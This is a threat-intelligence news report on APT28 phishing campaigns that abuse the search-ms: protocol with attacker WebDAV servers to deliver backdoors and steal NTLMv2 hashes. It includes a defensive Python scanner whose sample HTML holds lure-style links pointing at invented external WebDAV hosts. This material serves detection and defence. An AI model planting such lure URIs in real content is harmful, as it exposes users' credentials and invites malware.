Russian hackers unleash sophisticated phishing campaigns across the globe

The IBM X-Force threat intelligence team has uncovered a series of highly sophisticated phishing campaigns orchestrated by the notorious Russian state-sponsored group APT28 (aka UAC-0028, Fancy Bear, and Forest Blizzard), targeting organizations across Europe, the South Caucasus, Central Asia, and North and South America.

The modus operandi of the group, which the X-Force team tracks as ITG05, involves deploying multiple lure documents disguised as authentic materials from entities in Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the United States. These documents, a blend of internal and publicly available files, cover a wide array of topics including finance, critical infrastructure, executive engagements, cybersecurity, maritime security, healthcare, and defense industrial production.

Among these, four Ukrainian-language documents have been identified, covering a range of topics from legislative amendments to international healthcare acquisitions. Notably, these documents date back to the period between November 2023 and January 2024.

The investigation into the attacks revealed that the threat actor is using the hosting provider firstcloudit[.]com to stage payloads. The group has also been observed employing novel delivery techniques, such as abusing the Windows “search-ms:” URI protocol handler together with attacker-controlled WebDAV servers, to deploy malware including the recently discovered Masepie and Oceanmap backdoors. Oceanmap exhibits similarities to the group's earlier Credomap malware, the researchers said.

X-Force noted that APT28 has replaced older, more complex malware like Credomap with simplified PowerShell scripts like Steelhook.

An analysis of the infrastructure showed that the Common Name used in the TLS certificates indicates that both the WebDAV, as well as the Masepie command-and-control (C2) servers, may be hosted on compromised Ubiquiti routers. In February 2024, the US authorities disrupted a network comprised of hacked Ubiquiti EdgeRouters operated by APT28. The same network was used by the threat actor to target Ukrainian military personnel with phishing attacks a month prior to the takedown.

The researchers believe that, in addition to deploying secondary payloads, the group may be using the same delivery chain to leak NTLMv2 hashes. X-Force assesses that the threat actor may take advantage of vulnerabilities that enable the theft of NTLMv2 hashes, including the Outlook flaws CVE-2023-35636 and CVE-2024-21413 and the recent Microsoft Exchange vulnerability CVE-2024-21410.
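The search-ms abuse described above works because the URI's crumb=location: parameter can point Windows Explorer at a UNC path; an @80 or @SSL suffix on the host tells Windows to reach it through the WebDAV Mini-Redirector rather than SMB, so the victim's machine connects out to the attacker's server and, if that server demands NTLM authentication, hands over an NTLMv2 response. The Python scanner below is an added example and not X-Force's or IBM's code: it pulls search-ms: URIs out of lure HTML, parses the crumb parameters and classifies where each one would make the client connect. Every hostname and address in the sample, and the .corp.example internal DNS zone, are invented for the example.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed sample input, standing in for HTML that a mail gateway or proxy
# would extract from a lure page.  Every host, path and name below is invented.
SAMPLE_HTML = r"""
<a href="search-ms:query=pdf&crumb=location:\\10.0.0.5\docs&displayname=Documents">Internal share</a>
<a href="search-ms:query=report.pdf&crumb=location:%5C%5Cfiles.lure.invalid@80%5Cdav&displayname=Downloads">Open report</a>
<a href="search-ms:query=*&crumb=location:%5C%5C203.0.113.10@SSL%5Cshare&crumb=System.Kind:document">Open folder</a>
<a href="search-ms:query=notes&crumb=location:C:%5CUsers%5CPublic">Local search</a>
<a href="https://www.example.com/page">Normal link</a>
"""

# A search-ms: URI inside HTML runs until whitespace, a quote or an angle bracket.
SEARCH_MS_RE = re.compile(r"search-ms:[^\"'\s<>]+", re.IGNORECASE)

# UNC path as Windows parses it: \\host[@port|@SSL]\share\...
# The "@80" / "@SSL" suffix selects the WebDAV Mini-Redirector instead of SMB.
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(\d+|SSL))?(?:\\(.*))?$", re.IGNORECASE)

# RFC 1918, loopback and link-local ranges are treated as internal here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)  # assumed internal DNS zone (invented)


def parse_search_ms(uri):
    """Split a search-ms: URI into {param: [values]}, percent-decoding values.
    Parameters are '&'-separated key=value pairs and 'crumb' may repeat."""
    _scheme, _sep, body = uri.partition(":")
    params = {}
    for part in body.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            params.setdefault(key.lower(), []).append(unquote(value))
    return params


def unc_target(location):
    """Return (host, webdav_hint, share_path) for a UNC path, else None."""
    m = UNC_RE.match(location.strip())
    if not m:
        return None
    host, hint, path = m.groups()
    return host, (hint.upper() if hint else None), path or ""


def is_internal_host(host):
    """True for RFC 1918/loopback/link-local IPs, single-label (NetBIOS)
    names and hosts in the assumed internal DNS zone."""
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        name = host.lower().rstrip(".")
        return "." not in name or name.endswith(INTERNAL_SUFFIXES)


def scan_for_search_ms(text):
    """Find every search-ms: URI in text and classify where it would make the
    victim's machine connect.  Returns one dict per URI/location pair."""
    findings = []
    for m in SEARCH_MS_RE.finditer(text):
        uri = m.group(0)
        params = parse_search_ms(uri)
        locations = [c.split(":", 1)[1] for c in params.get("crumb", [])
                     if c.lower().startswith("location:")]
        if not locations:
            findings.append({"uri": uri, "host": None, "webdav_hint": None,
                             "verdict": "local-search"})
            continue
        for loc in locations:
            target = unc_target(loc)
            if target is None:          # local folder such as C:\Users\Public
                verdict, host, hint = "local-search", None, None
            else:
                host, hint, _path = target
                if is_internal_host(host):
                    verdict = "internal-share"
                elif hint:              # explicit WebDAV port: the lure pattern
                    verdict = "external-webdav"
                else:                   # bare UNC to the Internet: SMB egress attempt
                    verdict = "external-unc"
            findings.append({"uri": uri, "host": host, "webdav_hint": hint,
                             "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_for_search_ms(SAMPLE_HTML):
        print(f"{f['verdict']:16} host={f['host']} webdav={f['webdav_hint']}")
```

Treat external-webdav and external-unc findings as high severity; the same check applies to other lure carriers such as HTML attachments and LNK targets extracted from documents. The complementary network control is to block SMB (TCP 445) and WebDAV traffic from workstations to non-corporate hosts, which also limits the NTLMv2 hash theft the researchers warn of.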

“ITG05 remains adaptable to changes in opportunity by delivering new infection methodologies and leveraging commercially available infrastructure, while consistently evolving malware capabilities. X-Force assesses with high confidence that ITG05 will continue to leverage attacks against world governments and their political apparatus to provide Russia with advanced insight into emergent policy decisions,” the threat hunters warned.
